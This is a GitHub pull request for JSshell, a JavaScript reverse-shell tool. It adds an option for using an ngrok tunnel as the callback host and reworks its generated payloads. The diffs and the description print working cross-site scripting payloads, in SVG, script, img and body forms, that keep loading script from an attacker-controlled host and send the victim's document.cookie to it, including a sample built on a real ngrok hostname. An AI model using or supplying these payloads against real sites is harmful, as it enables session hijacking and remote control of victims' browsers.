### PR TITLE
Added support for ingress services e.g. ngrok and fixed the generated payload list

### DIFF
--- a/jsh.py
+++ b/jsh.py
@@ -32,9 +32,11 @@ parser = argparse.ArgumentParser(description='JSshell 3.1: javascript reverse sh
 parser.add_argument('-p', help='local port number (default: 4848)', dest='port', default=4848)
 parser.add_argument('-s', help='local source address', dest='host', default='')
 parser.add_argument('-g', help='generate JS reverse shell payload', dest='gene', action='store_true')
+parser.add_argument('-t', help='target address for ingress-as-a-server e.g. ngrok', dest='target', default=str())
 parser.add_argument('-c', help='command to execute after got shell', dest='command', default=str())
 parser.add_argument('-w', help='timeout for shell connection', dest='secs', type=float, default=0)
 parser.add_argument('-q', help='quiet mode', dest='quiet', action='store_true')
+
 
 args = parser.parse_args()
 
@@ -59,12 +61,22 @@ else:
 gene = args.gene
 cmd = format(args.command)
 secs = float(format(args.secs))
-payload = '''
- - SVG: <svg/onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}},1010)>
- - SCRIPT: <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}},1010)</script>
- - IMG: <img src=x onerror=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}},1010)>
- - BODY: <body onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}}></body>
-'''.format(host, port)
+target = args.target
+
+if len(target) > 0 and gene:
+    payload = '''
+    - SVG: <svg/onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?"+document.cookie}},1010)>
+    - SCRIPT: <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?"+document.cookie}},1010)</script>
+    - IMG: <img src=x onerror=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?"+document.cookie}},1010)>
+    - BODY: <body onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?"+document.cookie}},1010)></body>
+    '''.format(target)
+else:
+    payload = '''
+    - SVG: <svg/onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}},1010)>
+    - SCRIPT: <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}},1010)</script>
+    - IMG: <img src=x onerror=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}},1010)>
+    - BODY: <body onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}}></body>
+    '''.format(host, port)
 
         
 form = b'''HTTP/1.1 200 OK
@@ -155,9 +167,10 @@ def main():
         quit()
 
     uprint(banner)
-    if gene == True:
-        uprint('%sPayloads:  %s' % (white, payload))
 
+    if gene:
+        uprint('%sPayloads:  %s' % (white, payload))
+    
     print('%sListening on [any] %s for incoming JS shell ...' % (white, port))
 
     s.listen(2)

--- a/jsh.py
+++ b/jsh.py
@@ -67,13 +67,13 @@ if len(target) > 0 and gene:
 
     source = "{0}".format(target)
 else:
-    source = "{0}:{1}".format(host, port)
+    source = "//{0}:{1}".format(host, port)
     
 payload = '''
-    - SVG: <svg/onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?".concat(document.cookie)}},1010)>
-    - SCRIPT: <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?".concat(document.cookie)}},1010)</script>
-    - IMG: <img src=x onerror=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?".concat(document.cookie)}},1010)>
-    - BODY: <body onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?".concat(document.cookie)}},1010)></body>
+    - SVG: <svg/onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="{0}?".concat(document.cookie)}},1010)>
+    - SCRIPT: <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="{0}/?".concat(document.cookie)}},1010)</script>
+    - IMG: <img src=x onerror=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="{0}/?".concat(document.cookie)}},1010)>
+    - BODY: <body onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="{0}/?".concat(document.cookie)}},1010)></body>
     '''.format(source)
 
         

--- a/jsh.py
+++ b/jsh.py
@@ -64,19 +64,17 @@ secs = float(format(args.secs))
 target = args.target
 
 if len(target) > 0 and gene:
-    payload = '''
-    - SVG: <svg/onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?"+document.cookie}},1010)>
-    - SCRIPT: <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?"+document.cookie}},1010)</script>
-    - IMG: <img src=x onerror=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?"+document.cookie}},1010)>
-    - BODY: <body onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?"+document.cookie}},1010)></body>
-    '''.format(target)
+
+    source = "{0}".format(target)
 else:
-    payload = '''
-    - SVG: <svg/onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}},1010)>
-    - SCRIPT: <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}},1010)</script>
-    - IMG: <img src=x onerror=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}},1010)>
-    - BODY: <body onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}:{1}/?"+document.cookie}}></body>
-    '''.format(host, port)
+    source = "{0}:{1}".format(host, port)
+    
+payload = '''
+    - SVG: <svg/onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?".concat(document.cookie)}},1010)>
+    - SCRIPT: <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?".concat(document.cookie)}},1010)</script>
+    - IMG: <img src=x onerror=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?".concat(document.cookie)}},1010)>
+    - BODY: <body onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//{0}/?".concat(document.cookie)}},1010)></body>
+    '''.format(source)
 
         
 form = b'''HTTP/1.1 200 OK

--- a/jsh.py
+++ b/jsh.py
@@ -29,21 +29,28 @@ exit, quit            Exit the JS shell'''
 
 
 parser = argparse.ArgumentParser(description='JSshell 3.1: javascript reverse shell')
-parser.add_argument('-p', help='local port number (default: 4848)', dest='port', default=4848)
-parser.add_argument('-s', help='local source address', dest='host', default='')
-parser.add_argument('-g', help='generate JS reverse shell payload', dest='gene', action='store_true')
-parser.add_argument('-t', help='target address for ingress-as-a-server e.g. ngrok', dest='target', default=str())
-parser.add_argument('-c', help='command to execute after got shell', dest='command', default=str())
+parser.add_argument('-g', help='generate JS reverse shell payloads', dest='gene', action='store_true')
+parser.add_argument('-p', help='port number (default: 4848)', dest='port', default=4848)
+parser.add_argument('-s', help='source address (or hostname)', dest='host', default='')
+parser.add_argument('-t', help='target to be used in payloads, default: [host]:[port] from -s and -p', dest='target', default=str())
+parser.add_argument('-c', help='command to execute after get the shell', dest='command', default=str())
 parser.add_argument('-w', help='timeout for shell connection', dest='secs', type=float, default=0)
 parser.add_argument('-q', help='quiet mode', dest='quiet', action='store_true')
 
 
 args = parser.parse_args()
 
-host = format(args.host)
+host = args.host
+target = args.target
 
-if not len(host):
-    host = get('https://api.ipify.org').text
+if target:
+    source = target
+else:
+    if not host:
+        host = get('https://api.ipify.org').text
+
+    source = "//{0}:{1}".format(host, port)
+    
 try:
     port = int(format(args.port))
     if not 0 <= port <= 65535:
@@ -59,15 +66,8 @@ else:
     uprint = print
 
 gene = args.gene
-cmd = format(args.command)
-secs = float(format(args.secs))
-target = args.target
-
-if len(target) > 0 and gene:
-
-    source = "{0}".format(target)
-else:
-    source = "//{0}:{1}".format(host, port)
+cmd = args.command
+secs = args.secs
     
 payload = '''
     - SVG: <svg/onload=setInterval(function(){{with(document)body.appendChild(createElement("script")).src="{0}?".concat(document.cookie)}},1010)>


### PR DESCRIPTION
Generating payloads for an ingress service like ngrok was becoming a pain, since using the following command.

```
python3 jsh.py -s 3cd0-103-221-209-70.ngrok.io -p 80 -g
python3 jsh.py -s 3cd0-103-221-209-70.ngrok.io -p 443 -g
```
was making the resultant URL to `https://3cd0-103-221-209-70.ngrok.io:80` and the browser interrupted such connections, opening the connection for port `443` was making it difficult for ngrok to communicate with the attacker's local machine.

To clear this I added a tag `-t` which can allow a user to provide a custom hostname and port for generating the payloads, the below command will create payloads for the host `3cd0-103-221-209-70.ngrok.io` and the local machine can listen on a completely different port this makes it easy for the user to establish a connection with an ingress service and local machine.

![image](https://user-images.githubusercontent.com/18637512/208286341-1810d755-ce8e-48a5-a2bf-18dbcb776afe.png)

For listening on a different port the user can still specify the `-p` tag.

![image](https://user-images.githubusercontent.com/18637512/208286375-40e533d5-a73a-40d6-b743-3444fdad7eef.png)

**using the `-t` tag the user can remove the payload generation dependency on the provided local machine address and port.**

## Fixed the payloads

Earlier the payloads had the `+` character in them which sometimes did not work as the browser was treating the `+` character as a URL encoded string, to fix this I added `.concat(document.cookie)` in the payloads. refer below

![image](https://user-images.githubusercontent.com/18637512/208286734-23a3cd2f-1459-41a9-9103-bed7001b000b.png)

```
Payloads:
    - SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//3cd0-103-221-209-70.ngrok.io/?".concat(document.cookie)},1010)>
    - SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//3cd0-103-221-209-70.ngrok.io/?".concat(document.cookie)},1010)</script>
    - IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//3cd0-103-221-209-70.ngrok.io/?".concat(document.cookie)},1010)>
    - BODY: <body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//3cd0-103-221-209-70.ngrok.io/?".concat(document.cookie)},1010)></body>
```